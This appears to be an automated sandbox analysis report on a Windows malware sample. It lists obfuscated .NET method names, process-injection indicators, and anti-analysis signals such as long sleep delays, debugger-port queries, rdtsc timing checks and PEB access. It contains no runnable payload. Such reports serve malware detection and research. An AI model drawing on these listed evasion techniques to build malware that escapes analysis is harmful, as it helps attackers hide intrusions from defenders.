                Source: mKv3sKQ5Q4E7waF.exe | Static PE information: section name: .text entropy: 7.767145676620625
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, SuTMkKTIGlGsWNHncQ.cs | High entropy of concatenated method names: 'rEKcn5tWs4', 'z0IcsRG0H7', 'AI7ck6HdsV', 'Vu3k5pyhR4', 'fwskz7tarn', 'iSncWkJJf2', 'RYMcPulPvb', 'thjcEabBuF', 'gjDcb2Lr3q', 'tOWcYrXH4x'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.cs | High entropy of concatenated method names: 'dmabxLYwaV', 'AO7bnN4kQk', 'J1wbUhR2Li', 'dN9bsEGvAB', 'cL0binYuBL', 'NCKbkKl8FL', 'lklbcC6vPx', 'FjIbAKLOPl', 'W6eba8M3di', 'JIxbXbdCdI'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, BhXLZqPPuTKGGDJRbFt.cs | High entropy of concatenated method names: 'CaG252lX4x', 'JtH2zV1GR0', 'RbeVWy9iPV', 'HZKVPYm88H', 'rQCVE0VJDp', 'cawVbFHCEB', 'JRjVYkacsO', 'K3cVx8w9En', 'yTgVnYQJU4', 'niSVUP1lic'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, Kx1GDhgghTu9PW3w7v.cs | High entropy of concatenated method names: 'e9EsfnxueP', 'YAdsrtkNKB', 'gB9sNmgSJR', 'g6qsgV7dem', 'VNxs4CpfFP', 'U6VsDgEwuh', 'PsQsSIExWN', 'wvGspEee3o', 'DbRs0e0TZ7', 'QoKs2Uf89L'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, rBYAUJz6wAWbg3jL6H.cs | High entropy of concatenated method names: 'Ka82rFbcpI', 'LBV2NqCThq', 'MFF2gBoDEi', 's3x2B7ICqu', 'N5P2ym8r0d', 'AHC2jxyRVF', 'YMo2Mcrid7', 'ta92veAdu9', 'uAN2HW8oWb', 'ocX21m5kN6'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, lHrjOpPbaMjf6cHIFhk.cs | High entropy of concatenated method names: 'xd3V5ppwkH', 'KplVzWJKFm', 'Duu9Wq23Kd', 'jlektlVYwoTFPZ0xCka', 'Advwf7V93Oa73pfTbUS', 'yTc1t4VG2S4EPLZDiIC', 'eKc66uVDGBxixPrgcXp'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, hXOZMgPWoy5t7VGMb6h.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gg42qAEQNj', 'tLb27vj4lc', 'PK42hYxx1I', 'WFT2oBjAf6', 'KQO2LDIH7q', 'Lk4281Gb0v', 'HQg2tK9dyx'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, rJbSCCF0kQvgnWoG9w.cs | High entropy of concatenated method names: 'cUkSJAphEO', 'y7YS5bqCEL', 'cwqpWaawIX', 'KpqpPwine1', 'ERVSqvHCAI', 'M4HS7atNen', 'EMtSh0NHBN', 'Le5SobcTy8', 'NHRSLXL4HV', 'nRgS8L7cuh'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, wdbVOiEtP6Gd3v8DOQ.cs | High entropy of concatenated method names: 'PgkelgFe1', 'm2OfijXK6', 'PnHrVli8b', 'TfaK0OtXP', 'nxXgryfkG', 'ylrlhMUBZ', 'Jg7axLSpdU1OyOpNrA', 'PiyFxnKNSMnsUAWS64', 'vTa7V8TKQDC6ZBLPDd', 'UMppeSUUw'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, fkLHt5CC90DtjuGoCT.cs | High entropy of concatenated method names: 'NbO0BfahAo', 'DXc0yFBvb3', 'TwO06PUI6e', 'pMr0jrIufY', 'Nac0M53HwW', 'iUm0RsAdfl', 'Cm50TVrUjU', 'pNU0ZCnpki', 'E9f0mXlcq4', 'pXI0Ih7oQ3'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, crkeaN5sw8OIUM48cG.cs | High entropy of concatenated method names: 'pqS2srvX1L', 'GW92i3ymWU', 'R7S2kHi2Td', 'eNb2cIijEi', 'xmF20KQJVQ', 'KEH2AfRwLD', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, z4PbskhVDCbKMwMKko.cs | High entropy of concatenated method names: 'qTuwNgGhfb', 'NjtwgEgReU', 'KjMwBL2Mpm', 'X0awySw1hy', 'IQtwjfZsvc', 'Y87wM4B892', 'H7WwTuYAqf', 'sZEwZj9SkP', 'JCuwItwe5P', 'DCywqyUDeh'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, abXBRIlRPJp2EuvZGH.cs | High entropy of concatenated method names: 'qcYidYSP28', 'S7UiKA1dGE', 'Xats62PHjA', 'tWUsjnw8II', 'eTRsMCQryf', 's7vsRQUfkO', 'rEksTpW24S', 'cv7sZuo1cE', 'QiEsmBrwqs', 'D44sIGZmEu'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, GsKwv0o9cmKpMIr94F.cs | High entropy of concatenated method names: 'JfV4I20pmJ', 'nGK47WN0Ba', 'LDr4oM9dcS', 'Huw4LmupMc', 'SDN4yAB7FW', 'frq46bQPet', 'JL94jWw5Dg', 'Jma4MoYlOw', 'EVI4Rd82w1', 'OFQ4THVNyN'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, WE1V7aBLWMeVoWmRdf.cs | High entropy of concatenated method names: 'o1dkx2eopf', 'KZ9kU2eC07', 'CO2kion2PI', 'uGfkcAo8ML', 'qTXkARTkxi', 'wqNiupTjh9', 'A8NiFM6qmS', 'sE6iOFRW1p', 'tjRiJjaoxc', 'rwmiCVm9uI'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, QMVdhYm5OHL2OPrmSg.cs | High entropy of concatenated method names: 'tWjcH7TR1d', 'ITZc1UyxN0', 'CfrceHRbyP', 'pq1cfmMpdH', 'IXccdpa7ak', 'SH6crXyCp0', 'rC0cKWJ8rn', 'blMcN54Iu2', 'vE9cgIarAo', 'XFVclABZiA'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, xpnZcgsJiXC1IMvqhj.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rH4ECovY6T', 'TcjE58WYyK', 'YK8EzKKN2o', 'UX4bWhrcjM', 'TuFbPucfmb', 'dFlbELCLWe', 'iURbb4FKOp', 'eYnUBIrfsS5Q9I0TcME'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, rV7q4fYZRC0xmMKdHc.cs | High entropy of concatenated method names: 'KxlPcolyCt', 'Q8kPALdxjD', 'PghPXTu9PW', 'ww7PGvWbXB', 'UvZP4GHJE1', 't7aPDLWMeV', 'G6VmeroGZ1mFMZ0n8o', 'usgN7XJN2aIkDvCnU2', 'X0TPP9OMfC', 'XVSPb2gEKb'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FFWgXPUnjnYIHCLMC2.cs | High entropy of concatenated method names: 'Dispose', 'cL7PCk5I0h', 'uR9EyuWF83', 'dKEaee4hvH', 'YltP5mTo1U', 'dsBPzAMxNn', 'ProcessDialogKey', 'CvnEWkLHt5', 'X90EPDtjuG', 'QCTEEbrkea'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, pP3vR38Ho4i1OMCl5n.cs | High entropy of concatenated method names: 'ToString', 'DN4Dq2Apb6', 'CfGDyblZFL', 'OGHD6bWNqS', 'tjdDjPhpDt', 'q2wDMiXMsV', 'amODRQ2RgW', 'i08DTJd70A', 'lUkDZf6ec6', 'vlTDmaW75m'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, U9UOu2OmqbL7k5I0h5.cs | High entropy of concatenated method names: 'EPp04APBDe', 'OTJ0SmBKAx', 'Pkx00jGJ97', 'VRx0VJyQKJ', 'e3W0QTaGka', 'ECn0v059Mr', 'Dispose', 'VcEpno8u62', 'M1tpUx3mx1', 'oJ7psy4kBE'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, kv4clKyFl8wmhmdgTR.cs | High entropy of concatenated method names: 'ytId2TeKsBx3h5JMgiY', 'sDLsTqeTwocytNhPGHq', 'tjEkpBZdeK', 'k1Xk0c7huA', 'h3Xk2exjKB', 'eSAmSueFMYOUlxwDgtN', 'fhWnMYenCbDaFAQZfR0'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FolyCtNo8kLdxjDknn.cs | High entropy of concatenated method names: 'zp1UoERehN', 'RRpULr8kGc', 'vtTU8DeYTg', 'lm9UtrjwCa', 'Bv2UumBRfc', 'siVUFtS7uq', 'L2DUOadG2U', 'xq6UJgp07m', 'FCWUCFQj5H', 'urVU5P1R6M'

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe | Process information set: NOOPENFILEERRORBOX (40 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (108 identical entries)
Source: C:\Windows\SysWOW64\help.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: mKv3sKQ5Q4E7waF.exe PID: 6760, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D324
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D7E4
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D944
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D504
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D544
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D1E4
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B610154
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60DA44
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 8D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 45B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 9750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: A750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B096E rdtsc 3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5439Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1281Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 8583Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 1389Jump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\help.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe TID: 6828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep count: 8583 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep time: -17166000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep count: 1389 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep time: -2778000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep time: -66000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6188Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0061C3D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0061C3D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: 3_2_019B096E rdtsc 3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe Code function: 3_2_004178B3 LdrLoadDll, 3_2_004178B3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978550 mov eax, dword ptr fs:[00000030h]3_2_01978550
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978550 mov eax, dword ptr fs:[00000030h]3_2_01978550
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A656A mov eax, dword ptr fs:[00000030h]3_2_019A656A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A656A mov eax, dword ptr fs:[00000030h]3_2_019A656A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A656A mov eax, dword ptr fs:[00000030h]3_2_019A656A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A44B0 mov ecx, dword ptr fs:[00000030h]3_2_019A44B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FA4B0 mov eax, dword ptr fs:[00000030h]3_2_019FA4B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2A49A mov eax, dword ptr fs:[00000030h]3_2_01A2A49A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019764AB mov eax, dword ptr fs:[00000030h]3_2_019764AB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019704E5 mov ecx, dword ptr fs:[00000030h]3_2_019704E5
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8402 mov eax, dword ptr fs:[00000030h]3_2_019A8402
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8402 mov eax, dword ptr fs:[00000030h]3_2_019A8402
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8402 mov eax, dword ptr fs:[00000030h]3_2_019A8402
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA430 mov eax, dword ptr fs:[00000030h]3_2_019AA430
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196C427 mov eax, dword ptr fs:[00000030h]3_2_0196C427
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E420 mov eax, dword ptr fs:[00000030h]3_2_0196E420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E420 mov eax, dword ptr fs:[00000030h]3_2_0196E420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E420 mov eax, dword ptr fs:[00000030h]3_2_0196E420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199245A mov eax, dword ptr fs:[00000030h]3_2_0199245A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196645D mov eax, dword ptr fs:[00000030h]3_2_0196645D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199A470 mov eax, dword ptr fs:[00000030h]3_2_0199A470
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199A470 mov eax, dword ptr fs:[00000030h]3_2_0199A470
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199A470 mov eax, dword ptr fs:[00000030h]3_2_0199A470
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2A456 mov eax, dword ptr fs:[00000030h]3_2_01A2A456
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FC460 mov ecx, dword ptr fs:[00000030h]3_2_019FC460
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A247A0 mov eax, dword ptr fs:[00000030h]3_2_01A247A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1678E mov eax, dword ptr fs:[00000030h]3_2_01A1678E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019707AF mov eax, dword ptr fs:[00000030h]3_2_019707AF
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197C7C0 mov eax, dword ptr fs:[00000030h]3_2_0197C7C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F07C3 mov eax, dword ptr fs:[00000030h]3_2_019F07C3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019747FB mov eax, dword ptr fs:[00000030h]3_2_019747FB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019747FB mov eax, dword ptr fs:[00000030h]3_2_019747FB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019927ED mov eax, dword ptr fs:[00000030h]3_2_019927ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019927ED mov eax, dword ptr fs:[00000030h]3_2_019927ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019927ED mov eax, dword ptr fs:[00000030h]3_2_019927ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE7E1 mov eax, dword ptr fs:[00000030h]3_2_019FE7E1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970710 mov eax, dword ptr fs:[00000030h]3_2_01970710
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A0710 mov eax, dword ptr fs:[00000030h]3_2_019A0710
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC700 mov eax, dword ptr fs:[00000030h]3_2_019AC700
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A273C mov eax, dword ptr fs:[00000030h]3_2_019A273C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A273C mov ecx, dword ptr fs:[00000030h]3_2_019A273C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A273C mov eax, dword ptr fs:[00000030h]3_2_019A273C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EC730 mov eax, dword ptr fs:[00000030h]3_2_019EC730
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC720 mov eax, dword ptr fs:[00000030h]3_2_019AC720
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC720 mov eax, dword ptr fs:[00000030h]3_2_019AC720
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE75D mov eax, dword ptr fs:[00000030h]3_2_019FE75D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970750 mov eax, dword ptr fs:[00000030h]3_2_01970750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F4755 mov eax, dword ptr fs:[00000030h]3_2_019F4755
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2750 mov eax, dword ptr fs:[00000030h]3_2_019B2750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2750 mov eax, dword ptr fs:[00000030h]3_2_019B2750
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A674D mov esi, dword ptr fs:[00000030h]3_2_019A674D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A674D mov eax, dword ptr fs:[00000030h]3_2_019A674D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A674D mov eax, dword ptr fs:[00000030h]3_2_019A674D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978770 mov eax, dword ptr fs:[00000030h]3_2_01978770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980770 mov eax, dword ptr fs:[00000030h]3_2_01980770
